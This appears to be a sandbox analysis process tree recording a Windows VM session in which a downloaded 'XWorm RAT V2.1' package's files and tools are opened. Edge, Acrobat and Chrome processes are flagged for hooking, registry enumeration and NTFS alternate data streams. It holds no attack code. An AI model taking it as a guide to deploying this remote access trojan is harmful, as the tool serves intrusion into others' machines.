C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:5048
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1712 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Guna.UI2.dll"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4944 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵PID:4020
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C5312488AE7951256FD535A170B923D --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:2024
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=15B5A64AE6FE350026D67382BD5E688A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=15B5A64AE6FE350026D67382BD5E688A --renderer-client-id=2 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job /prefetch:14⤵PID:5824
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D38B3C5BF85A9F763E2E1F34D1422946 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:4232
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2268
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"1⤵PID:872
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe"1⤵PID:2652
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"1⤵PID:1416
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9986b3cb8,0x7ff9986b3cc8,0x7ff9986b3cd82⤵PID:2888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:22⤵PID:1112
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:32⤵PID:2348
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:82⤵PID:6032
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:3332
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:12⤵PID:3184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:12⤵PID:1924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:12⤵PID:5980
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 /prefetch:82⤵PID:2728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:12⤵PID:436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:12⤵PID:1392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:12⤵PID:2468
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:82⤵PID:2764
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:12⤵PID:1108
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5396 /prefetch:82⤵PID:5492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4592 /prefetch:82⤵PID:1124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:12⤵PID:4760
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:12⤵PID:4948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵PID:420
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:82⤵
- NTFS ADS
PID:4188 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:12⤵PID:5988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6792 /prefetch:22⤵PID:7132
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:12⤵PID:6316
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:12⤵PID:4652
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵PID:732
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:12⤵PID:6296
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:12⤵PID:5736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:82⤵
- NTFS ADS
PID:2828 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:12⤵PID:1012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7076 /prefetch:82⤵
- NTFS ADS
PID:3888 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:12⤵PID:5816
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 /prefetch:82⤵
- NTFS ADS
PID:2488 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:12⤵PID:6812
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:12⤵PID:6460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:12⤵PID:6660
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:3288
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:12⤵PID:2764
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6900 /prefetch:12⤵PID:4156
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵PID:1916
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:6324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:12⤵PID:5520
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7540 /prefetch:82⤵
- NTFS ADS
PID:1184 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:12⤵PID:6264
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:12⤵PID:4356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 /prefetch:82⤵
- NTFS ADS
PID:4920 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:12⤵PID:6180
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:12⤵PID:6652
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:12⤵PID:1416
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:6064
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:12⤵PID:6868
-
